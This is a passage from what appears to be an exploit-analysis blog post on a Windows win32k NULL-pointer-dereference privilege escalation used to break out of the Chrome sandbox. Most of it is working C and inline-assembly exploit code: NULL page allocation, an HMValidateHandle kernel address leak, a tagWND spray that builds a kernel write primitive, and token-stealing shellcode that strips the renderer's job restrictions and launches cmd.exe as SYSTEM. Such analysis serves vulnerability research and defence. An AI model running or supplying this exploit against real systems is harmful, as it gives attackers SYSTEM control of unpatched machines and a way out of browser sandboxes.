typedef NTSTATUS(WINAPI *NTAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG AllocationSize,
ULONG AllocationType,
ULONG Protect
);
NTAllocateVirtualMemory pfnNtAllocateVirtualMemory = 0;
....
pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
....
// Thanks to https://github.com/YeonExp/HEVD/blob/c19ad75ceab65cff07233a72e2e765be866fd636/NullPointerDereference/NullPointerDereference/main.cpp#L56 for
// explaining this in an example along with the finer details that are often forgotten.
bool allocateNullPage() {
/* Set the base address at which the memory will be allocated to 0x1.
This is done since a value of 0x0 will not be accepted by NtAllocateVirtualMemory,
however due to page alignment requirements the 0x1 will be rounded down to 0x0 internally.*/
PVOID BaseAddress = (PVOID)0x1;
/* Set the size to be allocated to 40960 to ensure that there
is plenty of memory allocated and available for use. */
SIZE_T size = 40960;
/* Call NtAllocateVirtualMemory to allocate the virtual memory at address 0x0 with the size
specified in the variable size. Also make sure the memory is allocated with read, write,
and execute permissions.*/
NTSTATUS result = pfnNtAllocateVirtualMemory(GetCurrentProcess(), &BaseAddress, 0x0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
// If the call to NtAllocateVirtualMemory failed, return FALSE.
if (result != 0x0) {
return FALSE;
}
// If the code reaches this point, then everything went well, so return TRUE.
return TRUE;
}
Finding the Address of HMValidateHandle
Once the NULL page has been allocated the exploit will then obtain the address of the HMValidateHandle() function. HMValidateHandle() is useful for attackers as it allows them to obtain a userland copy of any object provided that they have a handle. Additionally, this leak works at Low integrity on Windows versions prior to Windows 10 RS4.
By abusing this functionality to copy objects which contain a pointer to their location in kernel memory, such as tagWND (the window object), into user mode memory, an attacker can leak the addresses of various objects simply by obtaining a handle to them.
As the address of HMValidateHandle() is not exported from user32.dll, an attacker cannot obtain it directly via user32.dll's export table. Instead, the attacker must find another function that user32.dll exports which calls HMValidateHandle(), read the relative offset encoded in that call instruction, and then perform some math to calculate the true address of HMValidateHandle().
This is done by obtaining the address of the exported function IsMenu() from user32.dll and then searching for the first instance of the byte \xE8 within IsMenu()'s code, which is the opcode of the relative call to HMValidateHandle(). By then performing some math on the base address of user32.dll, the relative offset in the call instruction, and the offset of IsMenu() from the start of user32.dll, the attacker can obtain the address of HMValidateHandle(). This can be seen in the following code.
HMODULE hUser32 = LoadLibraryW(L"user32.dll");
LoadLibraryW(L"gdi32.dll");
// Find the address of HMValidateHandle using the address of user32.dll
if (findHMValidateHandleAddress(hUser32) == FALSE) {
printf("[!] Couldn't locate the address of HMValidateHandle!\r\n");
ExitProcess(-1);
}
...
BOOL findHMValidateHandleAddress(HMODULE hUser32) {
// The address of the function HMValidateHandleAddress() is not exported to
// the public. However the function IsMenu() contains a call to HMValidateHandle()
// within it after some short setup code. The call starts with the byte \xE8.
// Obtain the address of the function IsMenu() from user32.dll.
BYTE * pIsMenuFunction = (BYTE *)GetProcAddress(hUser32, "IsMenu");
if (pIsMenuFunction == NULL) {
printf("[!] Failed to find the address of IsMenu within user32.dll.\r\n");
return FALSE;
}
else {
printf("[*] pIsMenuFunction: 0x%08X\r\n", pIsMenuFunction);
}
// Search for the location of the \xEB byte within the IsMenu() function
// to find the start of the indirect call to HMValidateHandle().
unsigned int offsetInIsMenuFunction = 0;
BOOL foundHMValidateHandleAddress = FALSE;
for (unsigned int i = 0; i < 0x1000; i++) {
BYTE* pCurrentByte = pIsMenuFunction + i;
if (*pCurrentByte == 0xE8) {
offsetInIsMenuFunction = i + 1;
break;
}
}
// Throw error and exit if the \xE8 byte couldn't be located.
if (offsetInIsMenuFunction == 0) {
printf("[!] Couldn't find offset to HMValidateHandle within IsMenu.\r\n");
return FALSE;
}
// Output address of user32.dll in memory for debugging purposes.
printf("[*] hUser32: 0x%08X\r\n", hUser32);
// Get the value of the relative address being called within the IsMenu() function.
unsigned int relativeAddressBeingCalledInIsMenu = *(unsigned int *)(pIsMenuFunction + offsetInIsMenuFunction);
printf("[*] relativeAddressBeingCalledInIsMenu: 0x%08X\r\n", relativeAddressBeingCalledInIsMenu);
// Find out how far the IsMenu() function is located from the base address of user32.dll.
unsigned int addressOfIsMenuFromStartOfUser32 = ((unsigned int)pIsMenuFunction - (unsigned int)hUser32);
printf("[*] addressOfIsMenuFromStartOfUser32: 0x%08X\r\n", addressOfIsMenuFromStartOfUser32);
// Take this offset and add to it the relative address used in the call to HMValidateHandle().
// Result should be the offset of HMValidateHandle() from the start of user32.dll.
unsigned int offset = addressOfIsMenuFromStartOfUser32 + relativeAddressBeingCalledInIsMenu;
printf("[*] offset: 0x%08X\r\n", offset);
// Skip over 11 bytes since on Windows 10 these are not NOPs and it would be
// ideal if this code could be reused in the future.
pHmValidateHandle = (lHMValidateHandle)((unsigned int)hUser32 + offset + 11);
printf("[*] pHmValidateHandle: 0x%08X\r\n", pHmValidateHandle);
return TRUE;
}
Creating an Arbitrary Kernel Address Write Primitive with Window Objects
Once the address of HMValidateHandle() has been obtained, the exploit will call the sprayWindows() function. The first thing that sprayWindows() does is register a new window class named sprayWindowClass using RegisterClassExW(). The sprayWindowClass will also be set up such that any windows created with this class will use the attacker defined window procedure sprayCallback().
An HWND table named hwndSprayHandleTable will then be created, and a loop will call CreateWindowExW() to create 0x100 tagWND objects of class sprayWindowClass and save their handles into hwndSprayHandleTable. Once this spray is complete, two nested loops will be used to obtain a userland copy of each of the tagWND objects using HMValidateHandle().
The kernel address for each of these tagWND objects is then obtained by examining the tagWND objects’ pSelf field. The kernel address of each of the tagWND objects are compared with one another until two tagWND objects are found that are less than 0x3FD00 apart in kernel memory, at which point the loops are terminated.
/* The following definitions define the various structures
needed within sprayWindows() */
typedef struct _HEAD
{
HANDLE h;
DWORD cLockObj;
} HEAD, *PHEAD;
typedef struct _THROBJHEAD
{
HEAD h;
PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;
typedef struct _THRDESKHEAD
{
THROBJHEAD h;
PVOID rpdesk;
PVOID pSelf; // points to the kernel mode address of the object
} THRDESKHEAD, *PTHRDESKHEAD;
....
// Spray the windows and find two that are less than 0x3fd00 apart in memory.
if (sprayWindows() == FALSE) {
printf("[!] Couldn't find two tagWND objects less than 0x3fd00 apart in memory after the spray!\r\n");
ExitProcess(-1);
}
....
// Define the HMValidateHandle window type TYPE_WINDOW appropriately.
#define TYPE_WINDOW 1
/* Main function for spraying the tagWND objects into memory and finding two
that are less than 0x3fd00 apart */
bool sprayWindows() {
HWND hwndSprayHandleTable[0x100]; // Create a table to hold 0x100 HWND handles created by the spray.
// Create and set up the window class for the sprayed window objects.
WNDCLASSEXW sprayClass = { 0 };
sprayClass.cbSize = sizeof(WNDCLASSEXW);
sprayClass.lpszClassName = TEXT("sprayWindowClass");
sprayClass.lpfnWndProc = sprayCallback; // Set the window procedure for the sprayed
// window objects to sprayCallback().
if (RegisterClassExW(&sprayClass) == 0) {
printf("[!] Couldn't register the sprayClass class!\r\n");
}
// Create 0x100 windows using the sprayClass window class with the window name "spray".
for (int i = 0; i < 0x100; i++) {
hwndSprayHandleTable[i] = CreateWindowExW(0, sprayClass.lpszClassName, TEXT("spray"), 0, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
}
// For each entry in the hwndSprayHandle table...
for (int x = 0; x < 0x100; x++) {
// Leak the kernel address of the current HWND being examined, save it into firstEntryAddress.
THRDESKHEAD *firstEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[x], TYPE_WINDOW);
unsigned int firstEntryAddress = (unsigned int)firstEntryDesktop->pSelf;
// Then start a loop to start comparing the kernel address of this hWND
// object to the kernel address of every other hWND object...
for (int y = 0; y < 0x100; y++) {
if (x != y) { // Skip over one instance of the loop if the entries being compared are
// at the same offset in the hwndSprayHandleTable
// Leak the kernel address of the second hWND object being used in
// the comparison, save it into secondEntryAddress.
THRDESKHEAD *secondEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[y], TYPE_WINDOW);
unsigned int secondEntryAddress = (unsigned int)secondEntryDesktop->pSelf;
// If the kernel address of the hWND object leaked earlier in the code is greater than
// the kernel address of the hWND object leaked above, execute the following code.
if (firstEntryAddress > secondEntryAddress) {
// Check if the difference between the two addresses is less than 0x3fd00.
if ((firstEntryAddress - secondEntryAddress) < 0x3fd00) {
printf("[*] Primary window address: 0x%08X\r\n", secondEntryAddress);
printf("[*] Secondary window address: 0x%08X\r\n", firstEntryAddress);
// Save the handle of secondEntryAddress into hPrimaryWindow
// and its address into primaryWindowAddress.
hPrimaryWindow = hwndSprayHandleTable[y];
primaryWindowAddress = secondEntryAddress;
// Save the handle of firstEntryAddress into hSecondaryWindow
// and its address into secondaryWindowAddress.
hSecondaryWindow = hwndSprayHandleTable[x];
secondaryWindowAddress = firstEntryAddress;
// Windows have been found, escape the loop.
break;
}
}
// If the kernel address of the hWND object leaked earlier in the code is less than
// the kernel address of the hWND object leaked above, execute the following code.
else {
// Check if the difference between the two addresses is less than 0x3fd00.
if ((secondEntryAddress - firstEntryAddress) < 0x3fd00) {
printf("[*] Primary window address: 0x%08X\r\n", firstEntryAddress);
printf("[*] Secondary window address: 0x%08X\r\n", secondEntryAddress);
// Save the handle of firstEntryAddress into hPrimaryWindow
// and its address into primaryWindowAddress.
hPrimaryWindow = hwndSprayHandleTable[x];
primaryWindowAddress = firstEntryAddress;
// Save the handle of secondEntryAddress into hSecondaryWindow
// and its address into secondaryWindowAddress.
hSecondaryWindow = hwndSprayHandleTable[y];
secondaryWindowAddress = secondEntryAddress;
// Windows have been found, escape the loop.
break;
}
}
}
}
// Check if the inner loop ended and the windows were found. If so print a debug message.
// Otherwise continue on to the next object in the hwndSprayTable array.
if (hPrimaryWindow != NULL) {
printf("[*] Found target windows!\r\n");
break;
}
}
Once two tagWND objects matching these requirements are found, their addresses will be compared to see which one is located earlier in memory. The tagWND object located earlier in memory will become the primary window; its address will be saved into the global variable primaryWindowAddress, whilst its handle will be saved into the global variable hPrimaryWindow. The other tagWND object will become the secondary window; its address is saved into secondaryWindowAddress and its handle is saved into hSecondaryWindow.
Once the addresses of these windows have been saved, the handles to the other windows within hwndSprayHandleTable are destroyed using DestroyWindow() in order to release resources back to the host operating system.
// Check that hPrimaryWindow isn't NULL after both the loops are
// complete. This will only occur in the event that none of the 0x100
// window objects were within 0x3fd00 bytes of each other. If this occurs, then bail.
if (hPrimaryWindow == NULL) {
printf("[!] Couldn't find the right windows for the tagWND primitive. Exiting....\r\n");
return FALSE;
}
// This loop will destroy the handles to all other
// windows besides hPrimaryWindow and hSecondaryWindow,
// thereby ensuring that there are no lingering unused
// handles wasting system resources.
for (int p = 0; p < 0x100; p++) {
HWND temp = hwndSprayHandleTable[p];
if ((temp != hPrimaryWindow) && (temp != hSecondaryWindow)) {
DestroyWindow(temp);
}
}
addressToWrite = (UINT)primaryWindowAddress + 0x90; // Set addressToWrite to
// primaryWindow's cbwndExtra field.
printf("[*] Destroyed spare windows!\r\n");
// Check if its possible to set the window text in hSecondaryWindow.
// If this isn't possible, there is a serious error, and the program should exit.
// Otherwise return TRUE as everything has been set up correctly.
if (SetWindowTextW(hSecondaryWindow, L"test String") == 0) {
printf("[!] Something is wrong, couldn't initialize the text buffer in the secondary window....\r\n");
return FALSE;
}
else {
return TRUE;
}
The final part of sprayWindows() sets addressToWrite to the address of the cbwndExtra field within primaryWindowAddress in order to let the exploit know where the limited write primitive should write the value 0x40000000 to.
To understand why tagWND objects were sprayed and why the cbwndExtra and strName.Buffer fields of a tagWND object are important, it is necessary to examine a well-known kernel write primitive that exists on Windows versions prior to Windows 10 RS1.
As is explained in Saif El-Sherei and Ian Kronquist's The Life & Death of Kernel Object Abuse paper and Morten Schenk's Taking Windows 10 Kernel Exploitation to The Next Level presentation, if one can place two tagWND objects adjacent in memory and then edit the cbwndExtra field of the tagWND object located earlier in memory via a kernel write vulnerability, one can extend the expected length of that tagWND's WndExtra data field so that it appears to control memory that actually belongs to the second tagWND object.
The following diagram shows how the exploit utilizes this concept to set the cbwndExtra field of hPrimaryWindow to 0x40000000 by utilizing the limited write primitive that was explained earlier in this blog post, as well as how this adjustment allows the attacker to set data inside the second tagWND object that is located adjacent to it.
Effects of adjusting the cbwndExtra field in hPrimaryWindow
Once the cbwndExtra field of the first tagWND object has been overwritten, if an attacker calls SetWindowLong() on the first tagWND object, an attacker can overwrite the strName.Buffer field in the second tagWND object and set it to an arbitrary address. When SetWindowText() is called using the second tagWND object, the address contained in the overwritten strName.Buffer field will be used as destination address for the write operation.
By forming this stronger write primitive, the attacker can write controllable values to kernel addresses, which is a prerequisite to breaking out of the Chrome sandbox. The tagWND fields relevant to this technique are cbwndExtra, strName.Buffer, and the WndExtra data region that follows the object.
Leaking the Address of pPopupMenu for Write Address Calculations
Before continuing, let's reexamine how MNGetpItemFromIndex(), which returns the address to be written to, minus an offset of 0x4, operates. Recall that the decompiled version of this function is as follows.
tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
tagITEM *result; // eax
if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur here if spMenu is NULL.
result = 0;
else
result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
return result;
}
Notice that the final returned address is made up of two components: pPopupMenu, which is multiplied by 0x6C, and spMenu->rgItems, which will point to offset 0x34 in the NULL page. Without the ability to determine the values of both of these items, the attacker cannot fully control what address is returned by MNGetpItemFromIndex(), and hence which address xxxMNSetGapState() writes to in memory.
There is a solution for this however, which can be observed by viewing the updates made to the code for SubMenuProc(). The updated code takes the wParam parameter and adds 0x10 to it to obtain the value of pPopupMenu. This is then used to set the value of the variable addressToWriteTo which is used to set the value of spMenu->rgItems within MNGetpItemFromIndex() so that it returns the correct address for xxxMNSetGapState() to write to.
LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
if (msg == WM_MN_FINDMENUWINDOWFROMPOINT){
printf("[*] In WM_MN_FINDMENUWINDOWFROMPOINT handler...\r\n");
printf("[*] Restoring window procedure...\r\n");
SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc);
/* The wParam parameter here has the same value as pPopupMenu inside MNGetpItemFromIndex,
except wParam is 0x10 less than pPopupMenu. The code below adjusts for this.
This is an important information leak as without this the attacker
cannot manipulate the values returned from MNGetpItemFromIndex, which
can result in kernel crashes and a dramatic decrease in exploit reliability.
*/
UINT pPopupAddressInCalculations = wParam + 0x10;
// Set the address to write to to be the right bit of cbwndExtra in the target tagWND.
UINT addressToWriteTo = ((addressToWrite + 0x6C) - ((pPopupAddressInCalculations * 0x6C) + 0x4));
To understand why this code works, it is necessary to reexamine the code for xxxMNFindWindowFromPoint(). Note that the address of pPopupMenu is sent by xxxMNFindWindowFromPoint() in the wParam parameter when it calls xxxSendMessage() to send a MN_FINDMENUWINDOWFROMPOINT message to the application’s main window. This allows the attacker to obtain the address of pPopupMenu by implementing a handler for MN_FINDMENUWINDOWFROMPOINT which saves the wParam parameter’s value into a local variable for later use.
LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
{
....
v6 = xxxSendMessage(
var_pPopupMenu->spwndNextPopup,
MN_FINDMENUWINDOWFROMPOINT,
(WPARAM)&pPopupMenu,
(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the
// MN_FINDMENUWINDOWFROMPOINT usermode callback
// using the address of pPopupMenu as the
// wParam argument.
ThreadUnlock1();
if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user
// mode callback is a handle to a MFMWFP window.
v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned
// handle is a handle to
// a window object. Set v1 to
// TRUE if all is good.
...
During experiments, it was found that the value sent via xxxSendMessage() is 0x10 less than the value used in MNGetpItemFromIndex(). For this reason, the exploit code adds 0x10 to the value received from xxxSendMessage() to ensure that the value of pPopupMenu in the exploit code matches the value used inside MNGetpItemFromIndex().
Setting up the Memory in the NULL Page
Once addressToWriteTo has been calculated, the NULL page is set up. In order to set up the NULL page appropriately the following offsets need to be filled out:
0x20
0x34
0x4C
0x50 to 0x1050
This can be seen in more detail in the following diagram.
NULL page utilization
The exploit code starts by setting offset 0x20 in the NULL page to 0xFFFFFFFF. This is done because spMenu will be NULL at this point, so spMenu->cItems will be read from offset 0x20 of the NULL page. Setting the value at this address to a large unsigned integer ensures that spMenu->cItems is greater than the value of pPopupMenu, which prevents the bounds check in MNGetpItemFromIndex() from returning 0 instead of result. This check can be seen in the following code.
tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
tagITEM *result; // eax
if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur
// here if spMenu is NULL.
result = 0;
else
result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
return result;
}
Offset 0x34 of the NULL page will contain a DWORD which holds the value of spMenu->rgItems. This will be set to the value of addressToWriteTo so that the calculation in the final else branch above will set result to the address of primaryWindow's cbwndExtra field, minus an offset of 0x4.
The other offsets require a more detailed explanation. The following code shows the code within the function xxxMNUpdateDraggingInfo() which utilizes these offsets.
.text:BF975EA3 mov eax, [ebx+14h] ; EAX = ppopupmenu->spmenu
.text:BF975EA3 ;
.text:BF975EA3 ; Should set EAX to 0 or NULL.
.text:BF975EA6 push dword ptr [eax+4Ch] ; uIndex aka pPopupMenu. This will be the
.text:BF975EA6 ; value at address 0x4C given that
.text:BF975EA6 ; ppopupmenu->spmenu is NULL.
.text:BF975EA9 push eax ; spMenu. Will be NULL or 0.
.text:BF975EAA call MNGetpItemFromIndex
..............
.text:BF975EBA add ecx, [eax+28h] ; ECX += pItemFromIndex->yItem
.text:BF975EBA ;
.text:BF975EBA ; pItemFromIndex->yItem will be the value
.text:BF975EBA ; at offset 0x28 of whatever value
.text:BF975EBA ; MNGetpItemFromIndex returns.
...............
.text:BF975ECE cmp ecx, ebx
.text:BF975ED0 jg short loc_BF975EDB ; Jump to loc_BF975EDB if the following
.text:BF975ED0 ; condition is true:
.text:BF975ED0 ;
.text:BF975ED0 ; ((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))
As can be seen above, a call will be made to MNGetpItemFromIndex() using two parameters: spMenu which will be set to a value of NULL, and uIndex, which will contain the DWORD at offset 0x4C of the NULL page. The value returned by MNGetpItemFromIndex() will then be incremented by 0x28 before being used as a pointer to a DWORD. The DWORD at the resulting address will then be used to set pItemFromIndex->yItem, which will be utilized in a calculation to determine whether a jump should be taken. The exploit needs to ensure that this jump is always taken as it ensures that xxxMNSetGapState() goes about writing to addressToWrite in a consistent manner.
To ensure this jump is taken, the exploit sets the value at offset 0x4C in such a way that MNGetpItemFromIndex() will always return a value within the range 0x120 to 0x180. By then setting the bytes from offset 0x50 to 0x1050 of the NULL page to 0xF0, the attacker ensures that whatever value MNGetpItemFromIndex() returns, dereferencing it at offset 0x28 will set pItemFromIndex->yItem to 0xF0F0F0F0. This causes the left-hand side of the comparison shown in the assembly above to always be a very large unsigned integer, so the jump is always taken.
Forming a Stronger Write Primitive by Using the Limited Write Primitive
Once the NULL page has been set up, SubMenuProc() will return hWndFakeMenu to xxxSendMessage() in xxxMNFindWindowFromPoint(), where execution will continue.
After the xxxSendMessage() call, xxxMNFindWindowFromPoint() will call HMValidateHandleNoSecure() to ensure that hWndFakeMenu is a handle to a window object. This code can be seen below.
v6 = xxxSendMessage(
var_pPopupMenu->spwndNextPopup,
MN_FINDMENUWINDOWFROMPOINT,
(WPARAM)&pPopupMenu,
(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the
// MN_FINDMENUWINDOWFROMPOINT usermode callback
// using the address of pPopupMenu as the
// wParam argument.
ThreadUnlock1();
if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user
// mode callback is a handle to a MFMWFP window.
v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned handle
// is a handle to a window object.
// Set v1 to TRUE if all is good.
If hWndFakeMenu is deemed to be a valid handle to a window object, then xxxMNSetGapState() will be executed, which will set the cbwndExtra field in primaryWindow to 0x40000000, as shown below. This will allow SetWindowLong() calls that operate on primaryWindow to set values beyond the normal boundaries of primaryWindow‘s WndExtra data field, thereby allowing primaryWindow to make controlled writes to data within secondaryWindow.
void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
{
...
var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write
// operation should occur, minus an
// offset of 0x4.
temp_var_PITEM = var_PITEM;
if ( var_PITEM )
{
...
var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the
// address where the second write operation
// should occur, minus an offset of 0x4. This
// address will be 0x6C bytes earlier in
// memory than the address in var_PITEM.
if ( fSet )
{
*((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the
// attacker controlled address.
if ( var_PITEM_Minus_Offset_Of_0x6C )
{
*((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u;
// Conduct the second write to the attacker
// controlled address minus 0x68 (0x6C-0x4).
Once the kernel write operation within xxxMNSetGapState() is finished, the undocumented window message 0x1E5 will be sent. The updated exploit catches this message in the following code.
else {
if ((cwp->message == 0x1E5)) {
UINT offset = 0; // Create the offset variable which will hold the offset from the
// start of hPrimaryWindow's cbwnd data field to write to.
UINT addressOfStartofPrimaryWndCbWndData = (primaryWindowAddress + 0xB0); // Set
// addressOfStartofPrimaryWndCbWndData to the address of
// the start of hPrimaryWindow's cbwnd data field.
// Set offset to the difference between hSecondaryWindow's
// strName.Buffer's memory address and the address of
// hPrimaryWindow's cbwnd data field.
offset = ((secondaryWindowAddress + 0x8C) - addressOfStartofPrimaryWndCbWndData);
printf("[*] Offset: 0x%08X\r\n", offset);
// Set the strName.Buffer address in hSecondaryWindow to (secondaryWindowAddress + 0x16),
// or the address of the bServerSideWindowProc bit.
if (SetWindowLongA(hPrimaryWindow, offset, (secondaryWindowAddress + 0x16)) == 0) {
printf("[!] SetWindowLongA malicious error: 0x%08X\r\n", GetLastError());
ExitProcess(-1);
}
else {
printf("[*] SetWindowLongA called to set strName.Buffer address. Current strName.Buffer address that is being adjusted: 0x%08X\r\n", (addressOfStartofPrimaryWndCbWndData + offset));
}
This code will start by checking if the window message was 0x1E5. If it was then the code will calculate the distance between the start of primaryWindow‘s wndExtra data section and the location of secondaryWindow‘s strName.Buffer pointer. The difference between these two locations will be saved into the variable offset.
Once this is done, SetWindowLongA() is called using hPrimaryWindow and the offset variable to set secondaryWindow‘s strName.Buffer pointer to the address of secondaryWindow‘s bServerSideWindowProc field. The effect of this operation can be seen in the diagram below.
Using SetWindowLong() to change secondaryWindow’s strName.Buffer pointer
As a result, when SetWindowText() is called on secondaryWindow, it will use the overwritten strName.Buffer pointer to determine where the write should be conducted. If an appropriate value is supplied as the lpString argument to SetWindowText(), this overwrites secondaryWindow‘s bServerSideWindowProc flag.
Abusing the tagWND Write Primitive to Set the bServerSideWindowProc Bit
Once the strName.Buffer field within secondaryWindow has been set to the address of secondaryWindow‘s bServerSideWindowProc flag, SetWindowText() is called using an hWnd parameter of hSecondaryWindow and an lpString value of “\x06” in order to enable the bServerSideWindowProc flag in secondaryWindow.
// Write the value \x06 to the address pointed to by hSecondaryWindow's strName.Buffer
// field to set the bServerSideWindowProc bit in hSecondaryWindow.
if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) {
printf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError());
ExitProcess(-1);
}
else {
printf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16));
The following diagram shows what secondaryWindow‘s tagWND layout looks like before and after the SetWindowTextA() call.
Setting the bServerSideWindowProc flag in secondaryWindow with SetWindowText()
Setting the bServerSideWindowProc flag ensures that secondaryWindow‘s window procedure, sprayCallback(), will now run in kernel mode with SYSTEM level privileges, rather than in user mode like most other window procedures. This is a popular vector for privilege escalation and has been used in many attacks such as a 2017 attack by the Sednit APT group. The following diagram illustrates this in more detail.
Effect of setting bServerSideWindowProc
Stealing the Process Token and Removing the Job Restrictions
Once the call to SetWindowTextA() is completed, a WM_ENTERIDLE message will be sent to hSecondaryWindow, as can be seen in the following code.
printf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n");
SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL);
if (success == TRUE) {
printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
}
else {
printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
ExitProcess(-1);
}
The WM_ENTERIDLE message will then be picked up by secondaryWindow‘s window procedure sprayCallback(). The code for this function can be seen below.
// Tons of thanks go to https://github.com/jvazquez-r7/MS15-061/blob/first_fix/ms15-061.cpp for
// additional insight into how this function should operate. Note that a token stealing shellcode
// is called here only because trying to spawn processes or do anything complex as SYSTEM
// often resulted in APC_INDEX_MISMATCH errors and a kernel crash.
LRESULT CALLBACK sprayCallback(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    if (uMsg == WM_ENTERIDLE) {
        WORD um = 0;
        __asm
        {
            // Grab the value of the CS register and
            // save it into the variable um.
            mov ax, cs
            mov um, ax
        }
        // If um is 0x1B, this function is executing in user mode
        // and something went wrong. Therefore output a message that
        // the exploit didn't succeed and bail.
        if (um == 0x1b)
        {
            // USER MODE
            printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");
            // Bail, as if this code is hit either the target isn't
            // vulnerable or something is wrong with the exploit.
            ExitProcess(-1);
        }
        else
        {
            // Set the success flag to indicate the sprayCallback()
            // window procedure is running as SYSTEM.
            success = TRUE;
            // Call the Shellcode() function to perform the token stealing and
            // to remove the Job object on the Chrome renderer process.
            Shellcode();
        }
    }
    return DefWindowProc(hWnd, uMsg, wParam, lParam);
}
As the bServerSideWindowProc flag has been set in secondaryWindow‘s tagWND object, sprayCallback() should now run as the SYSTEM user. The sprayCallback() function first checks that the incoming message is a WM_ENTERIDLE message. If it is, inline assembly examines the CS register to verify that sprayCallback() is indeed executing in kernel mode. If this check passes, the boolean success is set to TRUE to indicate the exploit succeeded, and the function Shellcode() is executed.
Shellcode() will perform a simple token stealing exploit using the shellcode shown on abatchy’s blog post with two slight modifications which have been highlighted in the code below.
// Taken from https://www.abatchy.com/2018/01/kernel-exploitation-2#token-stealing-payload-windows-7-x86-sp1.
// Essentially a standard token stealing shellcode, with two lines
// added to remove the Job object associated with the Chrome
// renderer process.
__declspec(noinline) int Shellcode()
{
__asm {
xor eax, eax // Set EAX to 0.
mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PcrbData.
// _KTHREAD is located at FS:[0x124]
mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process
mov ecx, eax // Copy current process _EPROCESS structure
xor edx, edx // Set EDX to 0.
mov DWORD PTR [ecx + 0x124], edx // Set the JOB pointer in the _EPROCESS structure to NULL.
mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4
SearchSystemPID:
mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, 0B8h
cmp [eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token
mov [ecx + 0xF8], edx // Assign SYSTEM process token.
}
}
The modification takes the EPROCESS structure of the Chrome renderer process and NULLs out its Job pointer. This is done because experiments showed that even if the shellcode stole the SYSTEM token, the token would still inherit the job object of the Chrome renderer process, preventing the exploit from spawning any child processes. NULLing out the Job pointer within the Chrome renderer process prior to changing its token removes the job restrictions from both the Chrome renderer process and any tokens that later get assigned to it.
To better understand the importance of NULLing the Job pointer, examine the following WinDBG dump of the EPROCESS structure for a normal Chrome renderer process. Notice that the Job field is filled in, so the job object restrictions are currently being applied to the process.
To confirm these restrictions are indeed in place, one can examine the process token for this process in Process Explorer, which confirms that the job contains a number of restrictions, such as prohibiting the spawning of child processes.
Job restrictions on the Chrome renderer process preventing spawning of child processes
If the Job field within the EPROCESS structure is set to NULL, WinDBG’s !process command no longer associates a job with the process.
Examining Process Explorer confirms that once the Job pointer in the Chrome renderer’s EPROCESS structure has been NULLed out, there is no longer any job associated with the Chrome renderer process. The Job tab is no longer available for the process, which means it can now spawn any child process it wishes.
No job object is associated with the process after the Job pointer is set to NULL
Spawning the New Process
Once Shellcode() finishes executing, WindowHookProc() will check whether the variable success was set to TRUE, indicating that the exploit completed successfully. If it was, a success message is printed before execution returns to main().
if (success == TRUE) {
printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
}
else {
printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
ExitProcess(-1);
}
main() will exit its window message handling loop since there are no more messages to be processed and will then perform a check to see if success is set to TRUE. If it is, then a call to WinExec() will be performed to execute cmd.exe with SYSTEM privileges using the stolen SYSTEM token.
// Execute command if exploit success.
if (success == TRUE) {
WinExec("cmd.exe", 1);
}
